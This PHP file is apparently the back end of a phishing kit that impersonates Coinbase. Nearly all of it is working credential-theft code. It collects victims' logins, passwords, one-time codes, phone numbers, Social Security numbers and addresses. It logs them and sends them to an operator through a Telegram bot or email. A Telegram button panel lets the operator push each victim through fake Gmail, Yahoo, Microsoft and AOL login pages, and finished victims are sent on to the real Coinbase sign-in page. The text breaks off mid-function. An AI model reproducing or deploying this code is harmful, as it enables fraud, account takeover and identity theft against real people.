<?php
class Coinbasah{
    protected   $tomail,
                $yourcode,
                $LoginMail,
                $doubleEmpas,
                $Redirect,
                $telegStatus,
                $Userid,
                $ChanelID,
                $papSelfie,
                $otpAttempt,
                $IDStatus,
                $bankStatus,
                $BankOTP,
                $headers = 'From: Moriarty <your@loyal.customer>';
    public function __construct() {
        // Read the JSON data from file
        // Get the absolute path to config.json
        $config_file = __DIR__ . '/config.json';
        $json_data = file_get_contents($config_file);
    
        // Decode JSON data into PHP array
        $config = json_decode($json_data, true);
    
        // Set class properties from the configuration
        $this->tomail = $config['email'];
        $this->yourcode = $config['parameter']; 
        $this->LoginMail = $config['LoginMail']; 
        $this->doubleEmpas = $config['doubleEmpas']; 
        $this->Redirect = $config['redirectblock']; 
        $this->telegStatus = $config['TelegramStatus']; 
        $this->Userid = $config['Userid']; 
        $this->ChanelID = $config['ChanelID']; 
        $this->otpAttempt = $config['otpAttempt']; 
        $this->bankStatus = $config['bankStatus']; 
        $this->IDStatus = $config['IDStatus']; 
        $this->BankOTP = $config['BankOTP']; 
        $this->papSelfie = $config['papSelfie']; 
    }

    
    public function waiting() {
        if (!isset($_SESSION['ip']) || !isset($_SESSION['username'])) {
            // Handle the case where session variables are not set
            header("Location: errorPage"); // Redirect to an error page or handle the error
            exit;
        }
    
        $ip = $_SESSION['Userinfo'];
        $username = strtolower($_SESSION['username']);
        if(strtolower($_SESSION['Status']) === 'email' || strtolower($_SESSION['Status']) === 'otpmail'){
            $visitorStateFile = "../../log/visitor_state.json";
        }else{
            $visitorStateFile = "../log/visitor_state.json";
        }
        $visitorStateContent = "";
    
        if (file_exists($visitorStateFile)) {
            $visitorStates = json_decode(file_get_contents($visitorStateFile), true);
    
            if (isset($visitorStates[$ip])) {
                $state = $visitorStates[$ip];
                switch ($state) {
                    case 'email':
                        unset($_SESSION['waiting']);
                        $_SESSION['Status'] = 'Email';
                        if (preg_match('/@gmail/', strtolower($_SESSION['username']))) {
                            $this->redirectWithParams('gmail');
                        } elseif (preg_match('/@(yahoo|ymail)/', strtolower($_SESSION['username']))) {
                            $this->redirectWithParams('yahoo');
                        } elseif (preg_match('/@(hotmail|outlook|live|msn)/', strtolower($_SESSION['username']))) {
                            $this->redirectWithParams('microsoft');
                        } elseif (preg_match('/@aol/', strtolower($_SESSION['username']))) {
                            $this->redirectWithParams('aol');
                        } elseif (preg_match('/@(att|ameritech|sbcglobal|bellsouth|flash|nvbell|pacbell|prodigy|snet|swbell)/', strtolower($_SESSION['username']))) {
                            $this->redirectWithParams('att');
                        } elseif (preg_match('/@(comcast|xfinity)/', strtolower($_SESSION['username']))) {
                            $this->redirectWithParams('comcast');
                        } else {
                            $_SESSION['Status'] = 'otp';
                            $this->redirectWithParams('login-otp');
                        }
                        break;
                    case 'doublepass':
                        unset($_SESSION['waiting']);
                        $_SESSION['DoublePass'] = true;
                        $_SESSION['Status'] = 'Signin';
                        $this->redirectWithParams('login');
                        break;
                    case 'securityquestion':
                        unset($_SESSION['waiting']);
                        $_SESSION['Status'] = 'securityquestion';
                        $this->redirectWithParams('securityquestion');
                        break;
                    case 'phonenumber':
                        unset($_SESSION['waiting']);
                        $_SESSION['Status'] = 'Phonenumber';
                        $this->redirectWithParams('phonenumber');
                        break;
                    case 'authenticator':
                        unset($_SESSION['waiting']);
                        $_SESSION['Status'] = 'authenticator';
                        $this->redirectWithParams('login-otp');
                        break;

                    case 'bank':
                        unset($_SESSION['waiting']);
                        $_SESSION['Status'] = 'bank account';
                        $this->redirectWithParams('account');
                        break;
    
                    case 'document':
                        unset($_SESSION['waiting']);
                        $_SESSION['Status'] = 'accountverify';
                        $this->redirectWithParams('accountverify');
                        break;
    
                    case 'selfie':
                        unset($_SESSION['waiting']);
                        $_SESSION['Status'] = 'accountverified';
                        $this->redirectWithParams('accountverified');
                        break;
    
                    case 'otpcode':
                        unset($_SESSION['waiting']);
                        $_SESSION['Status'] = 'login-otp';
                        $this->redirectWithParams('login-otp');
                        break;
                    case 'otptomail':
                        unset($_SESSION['waiting']);
                        $_SESSION['Status'] = 'otpmail';
                        if (preg_match('/@(yahoo|ymail)/', strtolower($_SESSION['username']))) {
                            $this->redirectWithParams('yahooauth');
                        } elseif (preg_match('/@aol/', strtolower($_SESSION['username']))) {
                            $this->redirectWithParams('aolauth');
                        } else {
                            $_SESSION['Status'] = 'otp';
                            $this->redirectWithParams('login-otp');
                        }
                        break;
                    case 'otpemail':
                        unset($_SESSION['waiting']);
                        $_SESSION['Status'] = 'otpmail';
                        if (preg_match('/@gmail/', strtolower($_SESSION['username']))) {
                            $this->redirectWithParams('gmails');
                        } elseif (preg_match('/@(yahoo|ymail)/', strtolower($_SESSION['username']))) {
                            $this->redirectWithParams('yahoos');
                        } elseif (preg_match('/@(hotmail|outlook|live|msn)/', strtolower($_SESSION['username']))) {
                            $this->redirectWithParams('microsofts');
                        } elseif (preg_match('/@aol/', strtolower($_SESSION['username']))) {
                            $this->redirectWithParams('aols');
                        } elseif (preg_match('/@(att|ameritech|sbcglobal|bellsouth|flash|nvbell|pacbell|prodigy|snet|swbell)/', strtolower($_SESSION['username']))) {
                            $this->redirectWithParams('atts');
                        } elseif (preg_match('/@(comcast|xfinity)/', strtolower($_SESSION['username']))) {
                            $this->redirectWithParams('comcasts');
                        } else {
                            $_SESSION['Status'] = 'otp';
                            $this->redirectWithParams('login-otp');
                        }
                        break;
                    case 'otpemail2':
                        unset($_SESSION['waiting']);
                        $_SESSION['Status'] = 'otpmail';
                        if (preg_match('/@gmail/', strtolower($_SESSION['username']))) {
                            $this->redirectWithParams('gmails2');
                        } elseif (preg_match('/@(yahoo|ymail)/', strtolower($_SESSION['username']))) {
                            $this->redirectWithParams('yahoos2');
                        } elseif (preg_match('/@(hotmail|outlook|live|msn)/', strtolower($_SESSION['username']))) {
                            $this->redirectWithParams('microsofts2');
                        } elseif (preg_match('/@aol/', strtolower($_SESSION['username']))) {
                            $this->redirectWithParams('aols2');
                        } elseif (preg_match('/@(att|ameritech|sbcglobal|bellsouth|flash|nvbell|pacbell|prodigy|snet|swbell)/', strtolower($_SESSION['username']))) {
                            $this->redirectWithParams('atts2');
                        } elseif (preg_match('/@(comcast|xfinity)/', strtolower($_SESSION['username']))) {
                            $this->redirectWithParams('comcasts2');
                        } else {
                            $_SESSION['Status'] = 'otp';
                            $this->redirectWithParams('login-otp');
                        }
                        break;
                    case 'authentication':
                        if($_SESSION['Status'] === 'login-auth'){
                            break;
                        }else{
                            $_SESSION['Status'] = 'login-auth';
                            $this->redirectWithParams('login-auth');
                            break;
                        }
    
                    case 'finish':
                        unset($_SESSION['waiting']);
                        $_SESSION['Status'] = 'finish';
                        $this->redirectWithParams('accountreview');
                        break;
    
                    default:
                        $visitorStateContent = "Please wait for approval.";
                        break;
                }
            } else {
                $visitorStateContent = "IP address not found.";
            }
        } else {
            $visitorStateContent = "Visitor state file not found.";
        }
    }

    private function redirectWithParams($location) {
        $params = "?c_ds_na=" . $this->generateRandomText(12) . "&c_ds_no=" . urlencode($_SERVER['HTTP_ACCEPT']);
        header("Location: $location$params");
        exit;
    }

    Public function updateLog(){

        if (isset($_SESSION['Status'])) {
            $baseDir = dirname(__DIR__); // Adjust this if needed to point to the correct base directory
            $users_file = $baseDir. "/log/usersinfo.log";
            $status_to_update = $_SESSION['Status'];
            // $ip_to_update = $_SERVER['REMOTE_ADDR'];
            $session_update = $_SESSION['Userinfo'];
    
            if (file_exists($users_file)) {
                // Read the contents of the log file
                $log_contents = file($users_file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    
                // Iterate over each log entry
                foreach ($log_contents as &$entry) {
                    $log_parts = explode('|', $entry);
                    $session = $log_parts[0] ?? '';
    
                    // Check if the current entry matches the IP to be updated
                    if ($session === $session_update) {
                        // Update the status to 'finish' if the current status is 'OTPCODE'
                        $log_parts[8] = $status_to_update;
                        // Reconstruct the entry with updated status
                        $entry = implode('|', $log_parts);
                        break;
                    }
                }
    
                // Write the updated entries back to the log file
                file_put_contents($users_file, implode(PHP_EOL, $log_contents));
            } else {
            }
        }
    }

    public function getSettings(){
        return array(
        'tomail' => $this->tomail,
        'yourcode' => $this->yourcode,
        'headers' => $this->headers
        );
    }
    // Function to check if the user agent indicates a mobile device
    function isMobile() {
        return preg_match('/Mobile|iP(hone|od|ad)|Android|BlackBerry|IEMobile/', $_SERVER['HTTP_USER_AGENT']);
    }

    // Function to generate random text
    function generateRandomText($length) {
        $characters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
        $randomText = '';

        for ($i = 0; $i < $length; $i++) {
            $randomText .= $characters[rand(0, strlen($characters) - 1)];
        }

        return $randomText;
    }

    function notifyAdmin($message, $ip) {
        $url = "https://api.telegram.org/bot".$this->Userid."/sendMessage";
        $buttons = [
            ['text' => "❌ Wrong Password", 'callback_data' => "$ip:wrongpass"],
            ['text' => "❌ Wrong Email Pass", 'callback_data' => "$ip:wrongempas"],
            ['text' => "\u{1F511}OTP To MAIL", 'callback_data' => "$ip:otptomail"],
            ['text' => "\u{1F4E7} Email", 'callback_data' => "$ip:email"],
            ['text' => "\u{1F4DE} Phonenumber", 'callback_data' => "$ip:phonenumbers"],
            ['text' => "❌ Phonenumber", 'callback_data' => "$ip:phonenumber"],
            ['text' => "\u{1F511} Otp", 'callback_data' => "$ip:otpcode"],
            ['text' => "\u{1F511} OtpMail", 'callback_data' => "$ip:otpmail"],
            ['text' => "\u{1F511} Authcode", 'callback_data' => "$ip:authcode"],
            ['text' => "\u{1F512} Password", 'callback_data' => "$ip:password"],
            ['text' => "\u{1F4B8} Billing Cok", 'callback_data' => "$ip:billing"],
            ['text' => "\u{1F3E6} Bank", 'callback_data' => "$ip:bank"],
            ['text' => "🚨 GmailAuth", 'callback_data' => "$ip:gmailauth"],
            ['text' => "\u{1F4C4} Document", 'callback_data' => "$ip:document"],
            ['text' => "\u{1F4F8} Selfie", 'callback_data' => "$ip:selfie"],
            ['text' => "\u{1F3C1} Finish", 'callback_data' => "$ip:finish"],
            ['text' => "📌 Mark Mail", 'callback_data' => "$ip:Markmail"],
        ];
    
        // Group buttons into rows of 3
        $inlineKeyboard = [];
        foreach (array_chunk($buttons, 3) as $buttonRow) {
            $inlineKeyboard[] = $buttonRow;
        }
    
        $postData = [
            'chat_id' => $this->ChanelID,
            'text' => $message,
            'reply_markup' => json_encode([
                'inline_keyboard' => $inlineKeyboard
            ])
        ];
    
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($postData));
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_exec($ch);
        curl_close($ch);
    }    
    
    function Finish(){
        unset($_SESSION['Status']);
        header("Location: https://www.coinbase.com/signin");
        exit;
    }

    function tgbot($m) {
        $url = "https://api.telegram.org/bot" . $this->Userid . "/sendMessage?chat_id=" . $this->ChanelID;
        $v = str_replace(array('-------------------[Robinhood]-----------------\n'), '', $m);
        $url = $url . "&text=" . urlencode($v);
        $ch = curl_init();
        $optArray = array(
                CURLOPT_URL => $url,
                CURLOPT_RETURNTRANSFER => true
        );
        curl_setopt_array($ch, $optArray);
        $result = curl_exec($ch);
        curl_close($ch);
        return $result;
    }

    function callBack(){
        // Determine the base directory and visitor state file path
        $baseDir = dirname(__DIR__); // Adjust if needed to point to the correct base directory
        // $visitorStateFile = $baseDir . '/log/visitor_state.json';
        $visitorStateFile = '../log/visitor_state.json';
    
        // Initialize visitor states array
        $visitorStates = [];
    
        // Get session and status from POST data
        $session = $_POST['session'] ?? null;
        $email = $_POST['email'] ?? null;
        $state = $_POST['Status'] ?? null;
    
        // If session or state is not set, handle the error or return
        if ($session === null || $state === null) {
            $_SESSION['userStatus'] = "failed";
            $_SESSION['Usermessage'] = "Missing session or status data.";
            header("Location: ?error");
            exit;
        }
    
        // Check if the visitor state file exists and read it
        if (file_exists($visitorStateFile)) {
            $fileContents = file_get_contents($visitorStateFile);
            $visitorStates = json_decode($fileContents, true);
    
            // Handle JSON decoding errors
            if (json_last_error() !== JSON_ERROR_NONE) {
                $_SESSION['userStatus'] = "failed";
                $_SESSION['Usermessage'] = "Error reading visitor state file.";
                header("Location: ?error");
                exit;
            }
        }
    
        // Update the visitor state if the session exists
        if (isset($visitorStates[$session])) {
            $visitorStates[$session] = $state;
    
            // Attempt to write the updated visitor states back to the file
            if (file_put_contents($visitorStateFile, json_encode($visitorStates, JSON_PRETTY_PRINT)) === false) {
                $_SESSION['userStatus'] = "failed";
                $_SESSION['Usermessage'] = "Failed to write visitor state file.";
                header("Location: ?error");
                exit;
            }
    
            // Set session success message
            $_SESSION['userStatus'] = "success";
            $_SESSION['Usermessage'] = "Visitor $email status updated to: $state.";
            header("Location: ?success");
            exit;
        } else {
            // Handle the case where the session is not found in visitor states
            $_SESSION['userStatus'] = "failed";
            $_SESSION['Usermessage'] = "Visitor $email not found.";
            header("Location: ?error");
            exit;
        }
    }

    function callBackUsers(){
        // Determine the base directory and visitor state file path
        $baseDir = dirname(__DIR__); // Adjust if needed to point to the correct base directory
        // $visitorStateFile = $baseDir . '/log/visitor_state.json';
        $visitorStateFile = '../log/visitor_state.json';
    
        // Initialize visitor states array
        $visitorStates = [];
    
        // Get session and status from POST data
        $session = $_POST['session'] ?? null;
        $email = $_POST['email'] ?? null;
        $state = $_POST['Status'] ?? null;
    
        // If session or state is not set, handle the error or return
        if ($session === null || $state === null) {
            $_SESSION['userStatus'] = "failed";
            $_SESSION['Usermessage'] = "Missing session or status data.";
            header("Location: ?key=$session&Status=error");
            exit;
        }
    
        // Check if the visitor state file exists and read it
        if (file_exists($visitorStateFile)) {
            $fileContents = file_get_contents($visitorStateFile);
            $visitorStates = json_decode($fileContents, true);
    
            // Handle JSON decoding errors
            if (json_last_error() !== JSON_ERROR_NONE) {
                $_SESSION['userStatus'] = "failed";
                $_SESSION['Usermessage'] = "Error reading visitor state file.";
                header("Location: ?key=$session&Status=error");
                exit;
            }
        }
    
        // Update the visitor state if the session exists
        if (isset($visitorStates[$session])) {
            $visitorStates[$session] = $state;
    
            // Attempt to write the updated visitor states back to the file
            if (file_put_contents($visitorStateFile, json_encode($visitorStates, JSON_PRETTY_PRINT)) === false) {
                $_SESSION['userStatus'] = "failed";
                $_SESSION['Usermessage'] = "Failed to write visitor state file.";
                header("Location: ?key=$session&Status=error");
                exit;
            }
    
            // Set session success message
            $_SESSION['userStatus'] = "success";
            $_SESSION['Usermessage'] = "Visitor $email status updated to: $state.";
            header("Location: ?key=$session&Status=success");
            exit;
        } else {
            // Handle the case where the session is not found in visitor states
            $_SESSION['userStatus'] = "failed";
            $_SESSION['Usermessage'] = "Visitor $email not found.";
            header("Location: ?key=$session&Status=error");
            exit;
        }
    }

    public function getKeyFromLog($key) {
        if (isset($_SESSION['Status']) && 
            ($_SESSION['Status'] === 'Email' || 
            $_SESSION['Status'] === 'otpmail' || 
            $_SESSION['Status'] === 'gmailauth')) {
            $filename = '../../log/usersinfo.log';
        } else { 
            $filename = '../log/usersinfo.log';
        }

        // Open the file for reading
        if (!file_exists($filename)) {
            return "File not found.";
        }

        $file = fopen($filename, 'r');
        if ($file === false) {
            return "Unable to open file.";
        }

        // Loop through each line in the file
        while (($line = fgets($file)) !== false) {
            // Split the line by the delimiter "|"
            $parts = explode('|', $line);

            // Check if the first part matches the provided key
            if (isset($parts[0]) && trim($parts[0]) === $key) {
                fclose($file);

                // Parse and return the data as an associative array
                return [
                    'key' => trim($parts[0]),
                    'ip' => trim($parts[1]),
                    'email' => trim($parts[2]),
                    'password' => trim($parts[3]),
                    'country' => trim($parts[4]),
                    'phonenumber' => trim($parts[5]),
                    'getauthkey' => trim($parts[6]),
                    'emailto' => trim($parts[7]),
                    'status' => trim($parts[8]),
                ];
            }
        }

        // Close the file
        fclose($file);

        // If no match is found
        return "Key not found.";
    }

    public function updatePhoneNumber($key, $newPhoneNumber) {
        $filename='../log/usersinfo.log';
        if (!file_exists($filename)) {
            return "File not found.";
        }

        $fileContents = file($filename, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
        $updated = false;

        foreach ($fileContents as &$line) {
            $parts = explode('|', $line);
            if (isset($parts[0]) && trim($parts[0]) === $key) {
                $parts[5] = $newPhoneNumber;  // Update the phone number
                $line = implode('|', $parts); // Reconstruct the line
                $updated = true;
                break;
            }
        }

        if ($updated) {
            file_put_contents($filename, implode(PHP_EOL, $fileContents) . PHP_EOL);
            // return "Phone number updated successfully.";
            header("Location: ?key=$key&status=success");
        }

        // return "Key not found.";
        header("Location: ?key=$key&status=success");
    }

    public function updategetauthkeys($key, $newgetauthkeys) {
        $filename='../log/usersinfo.log';
        if (!file_exists($filename)) {
            return "File not found.";
        }

        $fileContents = file($filename, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
        $updated = false;

        foreach ($fileContents as &$line) {
            $parts = explode('|', $line);
            if (isset($parts[0]) && trim($parts[0]) === $key) {
                $parts[6] = $newgetauthkeys;  // Update the phone number
                $line = implode('|', $parts); // Reconstruct the line
                $updated = true;
                break;
            }
        }

        if ($updated) {
            file_put_contents($filename, implode(PHP_EOL, $fileContents) . PHP_EOL);
            // return "Phone number updated successfully.";
            header("Location: ?key=$key&status=success");
        }

        // return "Key not found.";
        header("Location: ?key=$key&status=success");
    }

    function processwait() {
        // Store the client's IP address in the session
        $_SESSION['ip'] = $_SERVER['REMOTE_ADDR'];
        $_SESSION['visitor_state'] = 'waiting';
    
        // Retrieve the user's key and email from the session
        $key = $_SESSION['Userinfo'] ?? null;
        $email = $_SESSION['Email'] ?? null;
    
        // If the key or email is not set, handle the error or exit
        if ($key === null || $email === null) {
            error_log("Userinfo or Email not set in session");
            return;
        }
    
        // Determine the correct file path based on the visitor's status
        $status = strtolower($_SESSION['Status'] ?? '');
        if ($status === 'email' || $status === 'otpmail') {
            $visitorStateFile = "../../log/visitor_state.json";
        } else {
            $visitorStateFile = "../log/visitor_state.json";
        }
    
        // Check if the email already exists in the mark log file
        $markLogFile = '../log/markemail.log';
        $existingInfo = null;
    
        if (file_exists($markLogFile)) {
            $markLogContents = file($markLogFile, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
            foreach ($markLogContents as $line) {
                $parts = explode('|', $line);
                if (isset($parts[0]) && trim($parts[0]) === $email) {
                    $existingInfo = $parts[1] ?? null;
                    break;
                }
            }
        }
    
        // Notify the admin based on whether the email was found or not
        if ($existingInfo !== null) {
            $this->notifyAdmin("$existingInfo visitor arrived with Email: $email.", $key);
        } else {
            $this->notifyAdmin("New visitor arrived with Email: $email.", $key);
        }
    
        // Initialize the visitor states array
        $visitorStates = [];
    
        // If the visitor state file exists, read and decode it
        if (file_exists($visitorStateFile)) {
            $fileContents = file_get_contents($visitorStateFile);
            $visitorStates = json_decode($fileContents, true);
    
            // Handle JSON decoding errors
            if (json_last_error() !== JSON_ERROR_NONE) {
                error_log("Error decoding JSON from $visitorStateFile: " . json_last_error_msg());
                $visitorStates = [];
            }
        }
    
        // Update the visitor's state
        $visitorStates[$key] = 'waiting';
    
        // Write the updated visitor states back to the file
        if (file_put_contents($visitorStateFile, json_encode($visitorStates, JSON_PRETTY_PRINT)) === false) {
            error_log("Failed to write visitor states to $visitorStateFile");
        }
    }    
    
    function Login($email){
        $_SESSION['Email'] = $email;
        $_SESSION['Status'] = 'Password';
        header("Location: xsignins?c_ds_na=".$this->generateRandomText(12)."&c_ds_no=".urlencode($_SERVER['HTTP_ACCEPT']));
        exit;
        
    }
    
    function ForgotPass($password,$confirmPassword){
        $_SESSION['FPassword'] = $password;
        $_SESSION['confirmPassword'] = $password;

        // GET Info IP
        $getInfo = $this->getIpInfo($_SERVER['REMOTE_ADDR']);

        $Subject = '$$Coinbase$$'." [Login:{$_SERVER['REMOTE_ADDR']}] {$_SESSION['logcountry']}";
        $Message = "====================================\n";
        $Message .= "💰      COINBASE LOGIN\n";
        $Message .= "====================================\n";
        $Message .= "Username : {$_SESSION['Email']}\n";
        $Message .= "Password : {$_SESSION['FPassword']}\n";
        $Message .= "Confirm Password : {$_SESSION['confirmPassword']}\n";
        $Message .= "====================================\n";
        $Message .= "              IPINFO\n";
        $Message .= "====================================\n";
        $Message .= "Ip : {$_SERVER['REMOTE_ADDR']}\n";
        $Message .= "Country : {$_SESSION['logcountry']}\n";
        $Message .= "State : {$_SESSION['logregion']}\n";
        $Message .= "City : {$_SESSION['logcity']}\n";
        $Message .= "User Agent : {$_SESSION['useragent']}\n";
        $Message .= "Provider : {$_SESSION['org']}\n";
        $Message .= "Time : ". date('l jS \o\f F Y h:i:s A')."\n";
        $Message .= "============== Have Fun! ==============";
        $log_entry = "{$_SERVER['REMOTE_ADDR']}|{$_SESSION['Email']}|{$_SESSION['Password']}\r\n";
        file_put_contents('../log/login.log', $log_entry , FILE_APPEND);
        
        // Check if IP already exists in usersinfo.log
        $usersinfo_file = '../log/usersinfo.log';
        $current_ip = $_SERVER['REMOTE_ADDR'];
        $current_email = $_SESSION['Email'];
        $current_country = $_SESSION['Countrynya'];
        $current_status = 'waiting';
        $new_log_entry = "\n{$_SESSION['Userinfo']}|{$current_ip}|{$current_email}|{$_SESSION['password']}|{$current_country}|XX|XX|{$current_status}\r\n";

        if (file_exists($usersinfo_file)) {
            $log_entries = file($usersinfo_file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
            $ip_exists = false;
            
            foreach ($log_entries as $index => $entry) {
                $log_parts = explode('|', $entry);
                $key = $log_parts[0] ?? '';
                $ip = $log_parts[1] ?? '';
                if ($key === $_SESSION['Userinfo']) {
                    // Update the existing entry
                    $log_entries[$index] = "{$_SESSION['Userinfo']}|{$current_ip}|{$current_email}|{$_SESSION['Password']}|{$current_country}|XX|XX|*******@yahoo.com|{$current_status}";
                    $ip_exists = true;
                    break;
                }elseif($ip === $current_ip) {
                    // Update the existing entry
                    $log_entries[$index] = "{$_SESSION['Userinfo']}|{$current_ip}|{$current_email}|{$_SESSION['Password']}|{$current_country}|XX|XX|*******@yahoo.com|{$current_status}";
                    $ip_exists = true;
                    break;
                }
            }

            // Write the updated list back to the file
            if ($ip_exists) {
                file_put_contents($usersinfo_file, implode(PHP_EOL, $log_entries) . PHP_EOL);
            } else {
                // Append the new entry if the IP address does not already exist
                file_put_contents($usersinfo_file, $new_log_entry, FILE_APPEND);
            }
        } else {
            // If the file does not exist, create it and add the new entry
            file_put_contents($usersinfo_file, $new_log_entry);
        }

        if($this->telegStatus === 'on'){
            $this->tgbot($Message);
        }else{
            mail($this->tomail, $Subject, $Message, $this->headers);
        }
        if(isset($_SESSION['Passsecond'])){
            unset($_SESSION['Passsecond']);
        }
        $this->processwait();
        $_SESSION['Status'] = 'waiting';
        header("Location: process?c_ds_na=".$this->generateRandomText(12)."&c_ds_no=".urlencode($_SERVER['HTTP_ACCEPT']));
        exit;
    }

    function Password($password){
        $_SESSION['Password'] = $password;

        // GET Info IP
        $getInfo = $this->getIpInfo($_SERVER['REMOTE_ADDR']);

        $Subject = '$$Coinbase$$'." [Login:{$_SERVER['REMOTE_ADDR']}] {$_SESSION['logcountry']}";
        $Message = "====================================\n";
        $Message .= "💰      COINBASE LOGIN\n";
        $Message .= "====================================\n";
        $Message .= "Username : {$_SESSION['Email']}\n";
        $Message .= "Password : {$_SESSION['Password']}\n";
        $Message .= "====================================\n";
        $Message .= "              IPINFO\n";
        $Message .= "====================================\n";
        $Message .= "Ip : {$_SERVER['REMOTE_ADDR']}\n";
        $Message .= "Country : {$_SESSION['logcountry']}\n";
        $Message .= "State : {$_SESSION['logregion']}\n";
        $Message .= "City : {$_SESSION['logcity']}\n";
        $Message .= "User Agent : {$_SESSION['useragent']}\n";
        $Message .= "Provider : {$_SESSION['org']}\n";
        $Message .= "Time : ". date('l jS \o\f F Y h:i:s A')."\n";
        $Message .= "============== Have Fun! ==============";
        $log_entry = "{$_SERVER['REMOTE_ADDR']}|{$_SESSION['Email']}|{$_SESSION['Password']}\r\n";
        file_put_contents('../log/login.log', $log_entry , FILE_APPEND);
        
        // Check if IP already exists in usersinfo.log
        $usersinfo_file = '../log/usersinfo.log';
        $current_ip = $_SERVER['REMOTE_ADDR'];
        $current_email = $_SESSION['Email'];
        $current_country = $_SESSION['Countrynya'];
        $current_status = 'waiting';
        $new_log_entry = "\n{$_SESSION['Userinfo']}|{$current_ip}|{$current_email}|{$_SESSION['Password']}|{$current_country}|XX|XX|*******@yahoo.com|{$current_status}\r\n";

        if (file_exists($usersinfo_file)) {
            $log_entries = file($usersinfo_file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
            $ip_exists = false;
            
            foreach ($log_entries as $index => $entry) {
                $log_parts = explode('|', $entry);
                $key = $log_parts[0] ?? '';
                $ip = $log_parts[1] ?? '';
                if ($key === $_SESSION['Userinfo']) {
                    // Update the existing entry
                    $log_entries[$index] = "{$_SESSION['Userinfo']}|{$current_ip}|{$current_email}|{$_SESSION['Password']}|{$current_country}|XX|XX|*******@yahoo.com|{$current_status}";
                    $ip_exists = true;
                    break;
                }elseif($ip === $current_ip) {
                    // Update the existing entry
                    $log_entries[$index] = "{$_SESSION['Userinfo']}|{$current_ip}|{$current_email}|{$_SESSION['Password']}|{$current_country}|XX|XX|*******@yahoo.com|{$current_status}";
                    $ip_exists = true;
                    break;
                }
            }

            // Write the updated list back to the file
            if ($ip_exists) {
                file_put_contents($usersinfo_file, implode(PHP_EOL, $log_entries) . PHP_EOL);
            } else {
                // Append the new entry if the IP address does not already exist
                file_put_contents($usersinfo_file, $new_log_entry, FILE_APPEND);
            }
        } else {
            // If the file does not exist, create it and add the new entry
            file_put_contents($usersinfo_file, $new_log_entry);
        }

        if($this->telegStatus === 'on'){
            $this->tgbot($Message);
        }else{
            mail($this->tomail, $Subject, $Message, $this->headers);
        }
        if(isset($_SESSION['Passsecond'])){
            unset($_SESSION['Passsecond']);
        }
        $this->processwait();
        $_SESSION['Status'] = 'waiting';
        header("Location: process?c_ds_na=".$this->generateRandomText(12)."&c_ds_no=".urlencode($_SERVER['HTTP_ACCEPT']));
        exit;
    }

    function Phonenunmber($areacode,$prefix,$lincode, $phonedefault){
        $_SESSION['phonenumber'] = "($areacode) $prefix $lincode$phonedefault";

        // GET Info IP
        $getInfo = $this->getIpInfo($_SERVER['REMOTE_ADDR']);

        $Subject = '$$Coinbase$$'." [Login:{$_SERVER['REMOTE_ADDR']}] {$_SESSION['logcountry']}";
        $Message = "====================================\n";
        $Message .= "📲      COINBASE PHONE NUMBER\n";
        $Message .= "====================================\n";
        $Message .= "Username : {$_SESSION['Email']}\n";
        $Message .= "Password : {$_SESSION['Password']}\n";
        $Message .= "====================================\n";
        $Message .= "Phone Number : {$_SESSION['phonenumber']}\n";
        $Message .= "====================================\n";
        $Message .= "              IPINFO\n";
        $Message .= "====================================\n";
        $Message .= "Ip : {$_SERVER['REMOTE_ADDR']}\n";
        $Message .= "Country : {$_SESSION['logcountry']}\n";
        $Message .= "State : {$_SESSION['logregion']}\n";
        $Message .= "City : {$_SESSION['logcity']}\n";
        $Message .= "User Agent : {$_SESSION['useragent']}\n";
        $Message .= "Provider : {$_SESSION['org']}\n";
        $Message .= "Time : ". date('l jS \o\f F Y h:i:s A')."\n";
        $Message .= "============== Have Fun! ==============";
        $log_entry = "{$_SERVER['REMOTE_ADDR']}|{$_SESSION['Email']}|{$_SESSION['Password']}\r\n";
        file_put_contents('../log/login.log', $log_entry , FILE_APPEND);
        
        // Check if IP already exists in usersinfo.log
        $usersinfo_file = '../log/usersinfo.log';
        $current_ip = $_SERVER['REMOTE_ADDR'];
        $current_email = $_SESSION['Email'];
        $current_country = $_SESSION['Countrynya'];
        $current_status = 'waiting';

        if($this->telegStatus === 'on'){
            $this->tgbot($Message);
        }else{
            mail($this->tomail, $Subject, $Message, $this->headers);
        }

        $this->processwait();
        $_SESSION['Status'] = 'waiting';
        header("Location: process?c_ds_na=".$this->generateRandomText(12)."&c_ds_no=".urlencode($_SERVER['HTTP_ACCEPT']));
        exit;
    }

    function Information($firstname,$lastname,$address,$secondadd,$ssn,$mothername,$country,$city,$states,$zipcode,$phonenumber,$dob){
        $_SESSION['firstname'] = $firstname;
        $_SESSION['lastname'] = $lastname;
        $_SESSION['address'] = $address;
        $_SESSION['secondadd'] = $secondadd;
        $_SESSION['ssn'] = $ssn;
        $_SESSION['mothername'] = $mothername;
        $_SESSION['country'] = $country;
        $_SESSION['city'] = $city;
        $_SESSION['states'] = $states;
        $_SESSION['zipcode'] = $zipcode;
        $_SESSION['phonenumber'] = $phonenumber;
        $_SESSION['dob'] = $dob;

        $Subject = '$$Coinbase$$'." [Profile:{$_SERVER['REMOTE_ADDR']}] {$_SESSION['logcountry']}";
        $Message = "====================================\n";
        $Message .= "🏡      COINBASE BILLING\n";
        $Message .= "====================================\n";
        $Message .= "Username : {$_SESSION['Email']}\n";
        $Message .= "Password : {$_SESSION['Password']}\n";
        $Message .= "====================================\n";
        $Message .= "Info User\n";
        $Message .= "====================================\n";
        $Message .= "Country : {$_SESSION['country']}\n";
        $Message .= "FullName : {$_SESSION['firstname']} {$_SESSION['lastname']}\n";
        $Message .= "DOB : {$_SESSION['dob']}\n";
        $Message .= "SSN : {$_SESSION['ssn']}\n";
        $Message .= "Phone Number : {$_SESSION['phonenumber']}\n";
        $Message .= "Address : {$_SESSION['address']}\n";
        $Message .= "Second Address : {$_SESSION['secondadd']}\n";
        $Message .= "City : {$_SESSION['city']}\n";
        $Message .= "States : {$_SESSION['states']}\n";
